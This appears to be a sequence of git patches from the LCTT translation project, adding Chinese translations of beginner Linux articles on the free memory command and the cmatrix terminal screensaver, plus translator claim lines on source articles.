-[8]:https://www.howtoforge.com/images/linux_free_command/big/free-h.png
-[9]:https://bugs.launchpad.net/ubuntu/+source/procps/+bug/1551731
-[10]:https://www.howtoforge.com/images/linux_free_command/free-si-option.png
-[11]:https://www.howtoforge.com/images/linux_free_command/big/free-si-option.png
-[12]:https://www.howtoforge.com/images/linux_free_command/free-t-option.png
-[13]:https://www.howtoforge.com/images/linux_free_command/big/free-t-option.png
-[14]:https://linux.die.net/man/1/free
From b7b53846e8346f1ac2f8225a0ffe42abf3638cd9 Mon Sep 17 00:00:00 2001
From: jessie-pang <35220454+jessie-pang@users.noreply.github.com>
Date: Sat, 13 Jan 2018 14:38:00 +0800
Subject: [PATCH 290/371] Linux Free Command Explained for Beginners (6
Examples).md
---
...nd Explained for Beginners (6 Examples).md | 135 ++++++++++++++++++
1 file changed, 135 insertions(+)
create mode 100644 translated/tech/Linux Free Command Explained for Beginners (6 Examples).md
diff --git a/translated/tech/Linux Free Command Explained for Beginners (6 Examples).md b/translated/tech/Linux Free Command Explained for Beginners (6 Examples).md
new file mode 100644
index 0000000000..279bd0e75d
--- /dev/null
+++ b/translated/tech/Linux Free Command Explained for Beginners (6 Examples).md
@@ -0,0 +1,135 @@
+6 个例子让初学者掌握 free 命令
+======
+
+在 Linux 系统上,有时你可能想从命令行快速地了解系统的已使用和未使用的内存空间。如果你是一个 Linux 新手,有个好消息:有一条系统内置的命令可以显示这些信息:**free**。
+
+在本文中,我们会讲到 free 命令的基本用法以及它所提供的一些重要的功能。文中提到的所有命令和用法都是在 Ubuntu 16.04LTS 上测试过的。
+
+### Linux free 命令
+
+让我们看一下 free 命令的语法:
+
+free [options]
+
+free 命令的 man 手册如是说:
+
+```
+free 命令显示了系统的可用和已用的物理内存及交换内存的总量,以及内核用到的缓存空间。这些信息是从 /proc/meminfo 中得到的。
+```
+
+接下来我们用问答的方式了解一下 free 命令是怎么工作的。
+
+### Q1. 怎么用 free 命令查看已使用和未使用的内存?
+
+这很容易,您只需不加任何参数地运行 free 这条命令就可以了:
+
+free
+
+这是 free 命令在我的系统上的输出:
+
+[![view used and available memory using free command][1]][2]
+
+这些列是什么意思呢?
+
+[![Free command columns][3]][4]
+
+total - 安装的内存的总量(等同于 /proc/meminfo 中的 MemTotal 和 SwapTotal)
+
+used - 已使用的内存(计算公式为:total - free - buffers - cache)
+
+free - 未被使用的内存(等同于 /proc/meminfo 中的 MemFree 和 SwapFree)
+
+shared - 通常是临时文件系统使用的内存(等同于 /proc/meminfo 中的 Shmem;在内核 2.6.32 版本上生效,参数无效则显示为 0)
+
+buffers - 内核缓冲区使用的内存(等同于 /proc/meminfo 中的 Buffers)
+
+cache - 页面缓存和 Slab 分配机制使用的内存(等同于 /proc/meminfo 中的 Cached 和 Slab)
+
+buff/cache - buffers 与 cache 之和
+
+available - 在不计算交换空间的情况下,预计可以被新启动的应用程序所使用的内存空间。与 cache 或者 free 部分不同,这一列把页面缓存计算在内,并且不是所有的可回收 slab 内存都可以真正被回收,因为可能有被占用的部分。(等同于 /proc/meminfo 中的 MemAvailable;在内核 3.14 版本上生效,从内核 2.6.27 版本开始仿真;在其他版本上这个值与 free 这一列相同)
+
+### Q2. 如何更改显示的单位呢?
+
+如果需要的话,你可以更改内存的显示单位。比如说,想要内存以兆为单位显示,你可以用 **-m** 这个参数:
+
+free -m
+
+[![free command display metrics change][5]][6]
+
+同样地,你可以用 **-b** 以字节显示、**-k** 以 KB 显示、**-m** 以 MB 显示、**-g** 以 GB 显示、**\--tera** 以 TB 显示。
+
+### Q3. 怎么显示可读的结果呢?
+
+free 命令提供了 **-h** 这个参数使输出转化为可读的格式。
+
+free -h
+
+用这个参数,free 命令会自己决定用什么单位显示内存的每个数值。例如:
+
+[![diplsy data fromm free command in human readable form][7]][8]
+
+### Q4. 怎么让 free 命令以一定的时间间隔持续运行?
+
+您可以用 **-s** 这个参数让 free 命令以一定的时间间隔持续地执行。您需要传递给命令行一个数字参数,做为这个时间间隔的秒数。
+
+例如,使 free 命令每隔 3 秒执行一次:
+
+free -s 3
+
+如果您需要 free 命令只执行几次,您可以用 **-c** 这个参数指定执行的次数:
+
+free -s 3 -c 5
+
+上面这条命令可以确保 free 命令每隔 3 秒执行一次,总共执行 5 次。
+
+**注**:这个功能目前在Ubuntu系统上还存在 [问题][9],所以并未测试。
+
+### Q5. 怎么使 free 基于 1000 计算内存,而不是 1024?
+
+如果您指定 free 用 MB 来显示内存(用 -m 参数),但又想基于 1000 来计算结果,可以用 **\--sj** 这个参数来实现。下图展示了用与不用这个参数的结果:
+
+[![How to make free use power of 1000 \(not 1024\) while displaying memory figures][10]][11]
+
+### Q6. 如何使 free 命令显示每一列的总和?
+
+如果您想要 free 命令显示每一列的总和,你可以用 **-t** 这个参数。
+
+free -t
+
+如下图所示:
+
+[![How to make free display total of columns][12]][13]
+
+请注意 “Total” 这一行出现了。
+
+### 总结
+
+free 命令对于系统管理来讲是个极其有用的工具。它有很多参数可以定制化您的输出,易懂易用。我们在本文中也提到了很多有用的参数。练习完之后,请您移步至 [man 手册][14]了解更多内容。
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/linux-free-command/
+
+作者:[Himanshu Arora][a]
+译者:[jessie-pang](https://github.com/jessie-pang)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
+[1]:https://www.howtoforge.com/images/linux_free_command/free-command-output.png
+[2]:https://www.howtoforge.com/images/linux_free_command/big/free-command-output.png
+[3]:https://www.howtoforge.com/images/linux_free_command/free-output-columns.png
+[4]:https://www.howtoforge.com/images/linux_free_command/big/free-output-columns.png
+[5]:https://www.howtoforge.com/images/linux_free_command/free-m-option.png
+[6]:https://www.howtoforge.com/images/linux_free_command/big/free-m-option.png
+[7]:https://www.howtoforge.com/images/linux_free_command/free-h.png
+[8]:https://www.howtoforge.com/images/linux_free_command/big/free-h.png
+[9]:https://bugs.launchpad.net/ubuntu/+source/procps/+bug/1551731
+[10]:https://www.howtoforge.com/images/linux_free_command/free-si-option.png
+[11]:https://www.howtoforge.com/images/linux_free_command/big/free-si-option.png
+[12]:https://www.howtoforge.com/images/linux_free_command/free-t-option.png
+[13]:https://www.howtoforge.com/images/linux_free_command/big/free-t-option.png
+[14]:https://linux.die.net/man/1/free
From ec34e69d15631e06a0e22bb4ab0b63ea3973403a Mon Sep 17 00:00:00 2001
From: fan Li <15201710458@163.com>
Date: Sat, 13 Jan 2018 18:46:48 +0800
Subject: [PATCH 291/371] How to find hidden processes and ports on
Linux/Unix/Windows
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
申领翻译
---
... to find hidden processes and ports on Linux-Unix-Windows.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20111124 How to find hidden processes and ports on Linux-Unix-Windows.md b/sources/tech/20111124 How to find hidden processes and ports on Linux-Unix-Windows.md
index af18bdc08f..15b667f3d2 100644
--- a/sources/tech/20111124 How to find hidden processes and ports on Linux-Unix-Windows.md
+++ b/sources/tech/20111124 How to find hidden processes and ports on Linux-Unix-Windows.md
@@ -1,3 +1,5 @@
+Translating by ljgibbslf
+
How to find hidden processes and ports on Linux/Unix/Windows
======
Unhide is a little handy forensic tool to find hidden processes and TCP/UDP ports by rootkits / LKMs or by another hidden technique. This tool works under Linux, Unix-like system, and MS-Windows operating systems. From the man page:
From ca99416d90debf2925ed1466595056edd52b35d4 Mon Sep 17 00:00:00 2001
From: jessie-pang <35220454+jessie-pang@users.noreply.github.com>
Date: Sat, 13 Jan 2018 19:32:34 +0800
Subject: [PATCH 292/371] Delete Linux Free Command Explained for Beginners (6
Examples).md
---
...nd Explained for Beginners (6 Examples).md | 135 ------------------
1 file changed, 135 deletions(-)
delete mode 100644 translated/tech/Linux Free Command Explained for Beginners (6 Examples).md
diff --git a/translated/tech/Linux Free Command Explained for Beginners (6 Examples).md b/translated/tech/Linux Free Command Explained for Beginners (6 Examples).md
deleted file mode 100644
index 279bd0e75d..0000000000
--- a/translated/tech/Linux Free Command Explained for Beginners (6 Examples).md
+++ /dev/null
@@ -1,135 +0,0 @@
-6 个例子让初学者掌握 free 命令
-======
-
-在 Linux 系统上,有时你可能想从命令行快速地了解系统的已使用和未使用的内存空间。如果你是一个 Linux 新手,有个好消息:有一条系统内置的命令可以显示这些信息:**free**。
-
-在本文中,我们会讲到 free 命令的基本用法以及它所提供的一些重要的功能。文中提到的所有命令和用法都是在 Ubuntu 16.04LTS 上测试过的。
-
-### Linux free 命令
-
-让我们看一下 free 命令的语法:
-
-free [options]
-
-free 命令的 man 手册如是说:
-
-```
-free 命令显示了系统的可用和已用的物理内存及交换内存的总量,以及内核用到的缓存空间。这些信息是从 /proc/meminfo 中得到的。
-```
-
-接下来我们用问答的方式了解一下 free 命令是怎么工作的。
-
-### Q1. 怎么用 free 命令查看已使用和未使用的内存?
-
-这很容易,您只需不加任何参数地运行 free 这条命令就可以了:
-
-free
-
-这是 free 命令在我的系统上的输出:
-
-[![view used and available memory using free command][1]][2]
-
-这些列是什么意思呢?
-
-[![Free command columns][3]][4]
-
-total - 安装的内存的总量(等同于 /proc/meminfo 中的 MemTotal 和 SwapTotal)
-
-used - 已使用的内存(计算公式为:total - free - buffers - cache)
-
-free - 未被使用的内存(等同于 /proc/meminfo 中的 MemFree 和 SwapFree)
-
-shared - 通常是临时文件系统使用的内存(等同于 /proc/meminfo 中的 Shmem;在内核 2.6.32 版本上生效,参数无效则显示为 0)
-
-buffers - 内核缓冲区使用的内存(等同于 /proc/meminfo 中的 Buffers)
-
-cache - 页面缓存和 Slab 分配机制使用的内存(等同于 /proc/meminfo 中的 Cached 和 Slab)
-
-buff/cache - buffers 与 cache 之和
-
-available - 在不计算交换空间的情况下,预计可以被新启动的应用程序所使用的内存空间。与 cache 或者 free 部分不同,这一列把页面缓存计算在内,并且不是所有的可回收 slab 内存都可以真正被回收,因为可能有被占用的部分。(等同于 /proc/meminfo 中的 MemAvailable;在内核 3.14 版本上生效,从内核 2.6.27 版本开始仿真;在其他版本上这个值与 free 这一列相同)
-
-### Q2. 如何更改显示的单位呢?
-
-如果需要的话,你可以更改内存的显示单位。比如说,想要内存以兆为单位显示,你可以用 **-m** 这个参数:
-
-free -m
-
-[![free command display metrics change][5]][6]
-
-同样地,你可以用 **-b** 以字节显示、**-k** 以 KB 显示、**-m** 以 MB 显示、**-g** 以 GB 显示、**\--tera** 以 TB 显示。
-
-### Q3. 怎么显示可读的结果呢?
-
-free 命令提供了 **-h** 这个参数使输出转化为可读的格式。
-
-free -h
-
-用这个参数,free 命令会自己决定用什么单位显示内存的每个数值。例如:
-
-[![diplsy data fromm free command in human readable form][7]][8]
-
-### Q4. 怎么让 free 命令以一定的时间间隔持续运行?
-
-您可以用 **-s** 这个参数让 free 命令以一定的时间间隔持续地执行。您需要传递给命令行一个数字参数,做为这个时间间隔的秒数。
-
-例如,使 free 命令每隔 3 秒执行一次:
-
-free -s 3
-
-如果您需要 free 命令只执行几次,您可以用 **-c** 这个参数指定执行的次数:
-
-free -s 3 -c 5
-
-上面这条命令可以确保 free 命令每隔 3 秒执行一次,总共执行 5 次。
-
-**注**:这个功能目前在Ubuntu系统上还存在 [问题][9],所以并未测试。
-
-### Q5. 怎么使 free 基于 1000 计算内存,而不是 1024?
-
-如果您指定 free 用 MB 来显示内存(用 -m 参数),但又想基于 1000 来计算结果,可以用 **\--sj** 这个参数来实现。下图展示了用与不用这个参数的结果:
-
-[![How to make free use power of 1000 \(not 1024\) while displaying memory figures][10]][11]
-
-### Q6. 如何使 free 命令显示每一列的总和?
-
-如果您想要 free 命令显示每一列的总和,你可以用 **-t** 这个参数。
-
-free -t
-
-如下图所示:
-
-[![How to make free display total of columns][12]][13]
-
-请注意 “Total” 这一行出现了。
-
-### 总结
-
-free 命令对于系统管理来讲是个极其有用的工具。它有很多参数可以定制化您的输出,易懂易用。我们在本文中也提到了很多有用的参数。练习完之后,请您移步至 [man 手册][14]了解更多内容。
-
-
---------------------------------------------------------------------------------
-
-via: https://www.howtoforge.com/linux-free-command/
-
-作者:[Himanshu Arora][a]
-译者:[jessie-pang](https://github.com/jessie-pang)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.howtoforge.com
-[1]:https://www.howtoforge.com/images/linux_free_command/free-command-output.png
-[2]:https://www.howtoforge.com/images/linux_free_command/big/free-command-output.png
-[3]:https://www.howtoforge.com/images/linux_free_command/free-output-columns.png
-[4]:https://www.howtoforge.com/images/linux_free_command/big/free-output-columns.png
-[5]:https://www.howtoforge.com/images/linux_free_command/free-m-option.png
-[6]:https://www.howtoforge.com/images/linux_free_command/big/free-m-option.png
-[7]:https://www.howtoforge.com/images/linux_free_command/free-h.png
-[8]:https://www.howtoforge.com/images/linux_free_command/big/free-h.png
-[9]:https://bugs.launchpad.net/ubuntu/+source/procps/+bug/1551731
-[10]:https://www.howtoforge.com/images/linux_free_command/free-si-option.png
-[11]:https://www.howtoforge.com/images/linux_free_command/big/free-si-option.png
-[12]:https://www.howtoforge.com/images/linux_free_command/free-t-option.png
-[13]:https://www.howtoforge.com/images/linux_free_command/big/free-t-option.png
-[14]:https://linux.die.net/man/1/free
From 0fb3f8b07cd89ac316c69015d507275ec7a851df Mon Sep 17 00:00:00 2001
From: jessie-pang <35220454+jessie-pang@users.noreply.github.com>
Date: Sat, 13 Jan 2018 19:33:26 +0800
Subject: [PATCH 293/371] 20170925 Linux Free Command Explained for Beginners
(6 Examples).md
---
...nd Explained for Beginners (6 Examples).md | 135 ++++++++++++++++++
1 file changed, 135 insertions(+)
create mode 100644 translated/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
diff --git a/translated/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md b/translated/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
new file mode 100644
index 0000000000..279bd0e75d
--- /dev/null
+++ b/translated/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
@@ -0,0 +1,135 @@
+6 个例子让初学者掌握 free 命令
+======
+
+在 Linux 系统上,有时你可能想从命令行快速地了解系统的已使用和未使用的内存空间。如果你是一个 Linux 新手,有个好消息:有一条系统内置的命令可以显示这些信息:**free**。
+
+在本文中,我们会讲到 free 命令的基本用法以及它所提供的一些重要的功能。文中提到的所有命令和用法都是在 Ubuntu 16.04LTS 上测试过的。
+
+### Linux free 命令
+
+让我们看一下 free 命令的语法:
+
+free [options]
+
+free 命令的 man 手册如是说:
+
+```
+free 命令显示了系统的可用和已用的物理内存及交换内存的总量,以及内核用到的缓存空间。这些信息是从 /proc/meminfo 中得到的。
+```
+
+接下来我们用问答的方式了解一下 free 命令是怎么工作的。
+
+### Q1. 怎么用 free 命令查看已使用和未使用的内存?
+
+这很容易,您只需不加任何参数地运行 free 这条命令就可以了:
+
+free
+
+这是 free 命令在我的系统上的输出:
+
+[![view used and available memory using free command][1]][2]
+
+这些列是什么意思呢?
+
+[![Free command columns][3]][4]
+
+total - 安装的内存的总量(等同于 /proc/meminfo 中的 MemTotal 和 SwapTotal)
+
+used - 已使用的内存(计算公式为:total - free - buffers - cache)
+
+free - 未被使用的内存(等同于 /proc/meminfo 中的 MemFree 和 SwapFree)
+
+shared - 通常是临时文件系统使用的内存(等同于 /proc/meminfo 中的 Shmem;在内核 2.6.32 版本上生效,参数无效则显示为 0)
+
+buffers - 内核缓冲区使用的内存(等同于 /proc/meminfo 中的 Buffers)
+
+cache - 页面缓存和 Slab 分配机制使用的内存(等同于 /proc/meminfo 中的 Cached 和 Slab)
+
+buff/cache - buffers 与 cache 之和
+
+available - 在不计算交换空间的情况下,预计可以被新启动的应用程序所使用的内存空间。与 cache 或者 free 部分不同,这一列把页面缓存计算在内,并且不是所有的可回收 slab 内存都可以真正被回收,因为可能有被占用的部分。(等同于 /proc/meminfo 中的 MemAvailable;在内核 3.14 版本上生效,从内核 2.6.27 版本开始仿真;在其他版本上这个值与 free 这一列相同)
+
+### Q2. 如何更改显示的单位呢?
+
+如果需要的话,你可以更改内存的显示单位。比如说,想要内存以兆为单位显示,你可以用 **-m** 这个参数:
+
+free -m
+
+[![free command display metrics change][5]][6]
+
+同样地,你可以用 **-b** 以字节显示、**-k** 以 KB 显示、**-m** 以 MB 显示、**-g** 以 GB 显示、**\--tera** 以 TB 显示。
+
+### Q3. 怎么显示可读的结果呢?
+
+free 命令提供了 **-h** 这个参数使输出转化为可读的格式。
+
+free -h
+
+用这个参数,free 命令会自己决定用什么单位显示内存的每个数值。例如:
+
+[![diplsy data fromm free command in human readable form][7]][8]
+
+### Q4. 怎么让 free 命令以一定的时间间隔持续运行?
+
+您可以用 **-s** 这个参数让 free 命令以一定的时间间隔持续地执行。您需要传递给命令行一个数字参数,做为这个时间间隔的秒数。
+
+例如,使 free 命令每隔 3 秒执行一次:
+
+free -s 3
+
+如果您需要 free 命令只执行几次,您可以用 **-c** 这个参数指定执行的次数:
+
+free -s 3 -c 5
+
+上面这条命令可以确保 free 命令每隔 3 秒执行一次,总共执行 5 次。
+
+**注**:这个功能目前在Ubuntu系统上还存在 [问题][9],所以并未测试。
+
+### Q5. 怎么使 free 基于 1000 计算内存,而不是 1024?
+
+如果您指定 free 用 MB 来显示内存(用 -m 参数),但又想基于 1000 来计算结果,可以用 **\--sj** 这个参数来实现。下图展示了用与不用这个参数的结果:
+
+[![How to make free use power of 1000 \(not 1024\) while displaying memory figures][10]][11]
+
+### Q6. 如何使 free 命令显示每一列的总和?
+
+如果您想要 free 命令显示每一列的总和,你可以用 **-t** 这个参数。
+
+free -t
+
+如下图所示:
+
+[![How to make free display total of columns][12]][13]
+
+请注意 “Total” 这一行出现了。
+
+### 总结
+
+free 命令对于系统管理来讲是个极其有用的工具。它有很多参数可以定制化您的输出,易懂易用。我们在本文中也提到了很多有用的参数。练习完之后,请您移步至 [man 手册][14]了解更多内容。
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/linux-free-command/
+
+作者:[Himanshu Arora][a]
+译者:[jessie-pang](https://github.com/jessie-pang)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
+[1]:https://www.howtoforge.com/images/linux_free_command/free-command-output.png
+[2]:https://www.howtoforge.com/images/linux_free_command/big/free-command-output.png
+[3]:https://www.howtoforge.com/images/linux_free_command/free-output-columns.png
+[4]:https://www.howtoforge.com/images/linux_free_command/big/free-output-columns.png
+[5]:https://www.howtoforge.com/images/linux_free_command/free-m-option.png
+[6]:https://www.howtoforge.com/images/linux_free_command/big/free-m-option.png
+[7]:https://www.howtoforge.com/images/linux_free_command/free-h.png
+[8]:https://www.howtoforge.com/images/linux_free_command/big/free-h.png
+[9]:https://bugs.launchpad.net/ubuntu/+source/procps/+bug/1551731
+[10]:https://www.howtoforge.com/images/linux_free_command/free-si-option.png
+[11]:https://www.howtoforge.com/images/linux_free_command/big/free-si-option.png
+[12]:https://www.howtoforge.com/images/linux_free_command/free-t-option.png
+[13]:https://www.howtoforge.com/images/linux_free_command/big/free-t-option.png
+[14]:https://linux.die.net/man/1/free
From 4318609f36c7141b4a0be82601ebf1132d10f409 Mon Sep 17 00:00:00 2001
From: jessie-pang <35220454+jessie-pang@users.noreply.github.com>
Date: Sat, 13 Jan 2018 19:48:41 +0800
Subject: [PATCH 294/371] Update 20170921 Mastering file searches on Linux.md
---
sources/tech/20170921 Mastering file searches on Linux.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20170921 Mastering file searches on Linux.md b/sources/tech/20170921 Mastering file searches on Linux.md
index 80fde0f7f0..524585003c 100644
--- a/sources/tech/20170921 Mastering file searches on Linux.md
+++ b/sources/tech/20170921 Mastering file searches on Linux.md
@@ -1,3 +1,5 @@
+Translating by jessie-pang
+
Mastering file searches on Linux
======
From 9bd98b1742d38f53ce01394d2ba79aa254f518e9 Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Sat, 13 Jan 2018 20:35:15 +0800
Subject: [PATCH 295/371] Delete 20180103 Linux-Unix desktop fun- Simulates the
display from -The Matrix.md
---
... Simulates the display from -The Matrix.md | 115 ------------------
1 file changed, 115 deletions(-)
delete mode 100644 sources/tech/20180103 Linux-Unix desktop fun- Simulates the display from -The Matrix.md
diff --git a/sources/tech/20180103 Linux-Unix desktop fun- Simulates the display from -The Matrix.md b/sources/tech/20180103 Linux-Unix desktop fun- Simulates the display from -The Matrix.md
deleted file mode 100644
index 5c73a7458c..0000000000
--- a/sources/tech/20180103 Linux-Unix desktop fun- Simulates the display from -The Matrix.md
+++ /dev/null
@@ -1,115 +0,0 @@
-translating by CYLeft
-
-Linux/Unix desktop fun: Simulates the display from “The Matrix”
-======
-The Matrix is a science fiction action movie from 1999. It was written and directed by the Wachowski Brothers. The film has falling green characters on screen. The digital rain is representing the activity of the virtual reality in "The Matrix." You can now have Matrix digital rain with CMatrix on a Linux or Unix terminal too.
-
-
-## Install cmatrix
-
-Install and setup CMatrix as per your Linux/Unix version.
-
-### How to install cmatrix on a Debian/Ubuntu Linux
-
-Type the following [apt-get command][1]/[apt command][2] on a Debian/Ubuntu/Mint Linux:
-`$ sudo apt install cmatrix`
-Sample outputs:
-```
-[sudo] password for vivek:
-Reading package lists... Done
-Building dependency tree
-Reading state information... Done
-Suggested packages:
- cmatrix-xfont
-The following NEW packages will be installed:
- cmatrix
-0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
-Need to get 15.8 kB of archives.
-After this operation, 50.2 kB of additional disk space will be used.
-Get:1 http://in.archive.ubuntu.com/ubuntu artful/universe amd64 cmatrix amd64 1.2a-5build2 [15.8 kB]
-Fetched 15.8 kB in 0s (19.7 kB/s)
-Selecting previously unselected package cmatrix.
-(Reading database ... 205388 files and directories currently installed.)
-Preparing to unpack .../cmatrix_1.2a-5build2_amd64.deb ...
-Unpacking cmatrix (1.2a-5build2) ...
-Setting up cmatrix (1.2a-5build2) ...
-Processing triggers for man-db (2.7.6.1-2) ...
-```
-
-### How to install cmatrix on an Arch Linux
-
-Type the following pacman command:
-`$ sudo pacman -S cmatrix`
-
-### How to install cmatrix on a FreeBSD system
-
-To install the port run:
-`# cd /usr/ports/misc/cmatrix/ && make install clean`
-OR add the binary package using the pkg command
-`# pkg install cmatrix`
-
-### How to install cmatrix on a macOS Unix
-
-Type the following brew command:
-`$ brew install cmatrix`
-
-### How to install cmatrix on a OpenBSD
-
-Type the following pkg_add command:
-`# pkg_add cmatrix`
-
-## Using cmatrix
-
-Simply type the command:
-`$ cmatrix`
-[![cmtarix in action][3]][3]
-
-### Using keyboard
-
-The following keystrokes are available during execution (unavailable in -s mode):
-| KEYSTROKES | Description |
-| a | Toggle asynchronous scroll |
-| b | Random bold characters |
-| B | All bold characters |
-| n | Turn off bold characters |
-| 0-9 | Adjust update speed |
-| ! @ # $ % ^ & ) | Change the color of the matrix to the corresponding color: ! – red, @ –
-green, # – yellow, $ – blue, % – magenta, ^ – cyan, & – white, ) – black. |
-| q | Quit the program |
-
-You can pass the following option to the cmatrix command:
-`$ cmatrix -h`
-Sample outputs:
-```
--a: Asynchronous scroll
- -b: Bold characters on
- -B: All bold characters (overrides -b)
- -f: Force the linux $TERM type to be on
- -l: Linux mode (uses matrix console font)
- -o: Use old-style scrolling
- -h: Print usage and exit
- -n: No bold characters (overrides -b and -B, default)
- -s: "Screensaver" mode, exits on first keystroke
- -x: X window mode, use if your xterm is using mtx.pcf
- -V: Print version information and exit
- -u delay (0 - 10, default 4): Screen update delay
- -C [color]: Use this color for matrix (default green)
-```
-
-You now have the coolest terminal app!
-
-
---------------------------------------------------------------------------------
-
-via: https://www.cyberciti.biz/open-source/command-line-hacks/matrix-digital-rain-on-linux-macos-unix-terminal/
-
-作者:[][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.cyberciti.biz
-[1]:https://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info)
-[2]:https://www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info)
-[3]:https://www.cyberciti.biz/media/new/cms/2018/01/small-cmtarix-file.gif
From b526926b288b0971edc6dca385b9c61c7fe991cc Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Sat, 13 Jan 2018 20:36:21 +0800
Subject: [PATCH 296/371] translated by cyleft
Linux-Unix desktop fun- Simulates the display from -The Matrix2
---
... Simulates the display from -The Matrix.md | 111 ++++++++++++++++++
1 file changed, 111 insertions(+)
create mode 100644 translated/tech/20180103 Linux-Unix desktop fun- Simulates the display from -The Matrix.md
diff --git a/translated/tech/20180103 Linux-Unix desktop fun- Simulates the display from -The Matrix.md b/translated/tech/20180103 Linux-Unix desktop fun- Simulates the display from -The Matrix.md
new file mode 100644
index 0000000000..7a3a6b6207
--- /dev/null
+++ b/translated/tech/20180103 Linux-Unix desktop fun- Simulates the display from -The Matrix.md
@@ -0,0 +1,111 @@
+Linux/Unix 桌面盛典:伪造“黑客帝国”界面!
+======
+《黑客帝国》是 1999 年,由 Wachowki 兄弟撰写的的科幻动作片。这部电影的荧屏里有无尽的绿色字符降落。《黑客帝国》的数字雨模拟着虚拟现实活动。现在,Linux 和 Unix 终端上,你也可以通过 CMatrix 模仿出矩阵数字雨。
+
+## 安装 cmatrix
+
+在你的每一台 Linux/Unix 发行版上安装并且设置 CMatrix。
+
+### 如何在 Debian/Ubuntu Linux 发行版中安装 cmatrix
+
+在 Debian/Ubuntu/Mint 系统中键入以下命令 [apt-get 命令][1]/[apt 命令][2]:
+`$ sudo apt install cmatrix`
+示例输出:
+```
+[sudo] password for vivek:
+Reading package lists... Done
+Building dependency tree
+Reading state information... Done
+Suggested packages:
+ cmatrix-xfont
+The following NEW packages will be installed:
+ cmatrix
+0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
+Need to get 15.8 kB of archives.
+After this operation, 50.2 kB of additional disk space will be used.
+Get:1 http://in.archive.ubuntu.com/ubuntu artful/universe amd64 cmatrix amd64 1.2a-5build2 [15.8 kB]
+Fetched 15.8 kB in 0s (19.7 kB/s)
+Selecting previously unselected package cmatrix.
+(Reading database ... 205388 files and directories currently installed.)
+Preparing to unpack .../cmatrix_1.2a-5build2_amd64.deb ...
+Unpacking cmatrix (1.2a-5build2) ...
+Setting up cmatrix (1.2a-5build2) ...
+Processing triggers for man-db (2.7.6.1-2) ...
+```
+
+### 如何在 Arch Linux 发行版安装 cmatrix
+
+键入 pacman 命令:
+`$ sudo pacman -S cmatrix`
+
+### 如何在 FreeBCD 系统中安装 cmatrix
+
+安装运行端口:
+`# cd /usr/ports/misc/cmatrix/ && make install clean`
+或者使用 pkg 命令添加二进制包
+`# pkg install cmatrix`
+
+### 如何在 macOS Unix 发行版中安装 cmatrix
+
+键入下列命令:
+`$ brew install cmatrix`
+
+### 如何在 OpenBSD 系统中安装 cmatrix
+
+键入 pkg_add 命令:
+`# pkg_add cmatrix`
+
+## 使用 cmatrix
+
+简单模式下,命令:
+`$ cmatrix`
+[![cmtarix 运转中][3]][3]
+
+### 使用键盘
+
+在执行期间,下列按键有效(-s 模式下,按键无效):
+| 按键 | 说明 |
+| a | 切换异步滚动 |
+| b | 随机字符加粗 |
+| B | 字符加粗 |
+| n | 关闭字符加粗 |
+| 0-9 | 调整更新时间 |
+| ! @ # $ % ^ & ) | 改变对应的矩阵颜色: ! – 红, @ –
+绿, # – 黄, $ – 蓝, % – 洋红, ^ – 青, & – 白, ) – 黑. |
+| q | 退出程序 |
+
+你可以通过以下命令获取 cmatrix 选项:
+`$ cmatrix -h`
+示例输出:
+```
+-a: 异步滚动
+ -b: 开启字符加粗
+ -B: 所有字符加粗(优先于 -b 选项)
+ -f: 强制开启 Linux $TERM 模式
+ -l: Linux 模式(使用 matrix 控制台字体)
+ -o: 启用旧式滚动
+ -h: 输出使用说明并退出
+ -n: 关闭字符加粗 (优先于 -b and -B,默认)
+ -s: “屏保”模式,, 第一次按键时退出
+ -x: X 窗口模式,如果你使用的时 mtx.pcf 终端
+ -V: 输出版本信息并且退出
+ -u delay (0 - 10, default 4): 屏幕更新延时
+ -C [color]: 调整 matrix 颜色(默认绿色)
+```
+
+现在,你拥有了一款最炫酷的终端软件!
+
+--------------------------------------------------------------------------------
+
+via: https://www.cyberciti.biz/open-source/command-line-hacks/matrix-digital-rain-on-linux-macos-unix-terminal/
+
+作者:[][a]
+译者:[CYLeft](https://github.com/CYLeft)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.cyberciti.biz
+[1]:https://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info)
+[2]:https://www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info)
+[3]:https://www.cyberciti.biz/media/new/cms/2018/01/small-cmtarix-file.gif
From 187532a62a89d718ffeb483d10a361099d14ff6d Mon Sep 17 00:00:00 2001
From: wxy
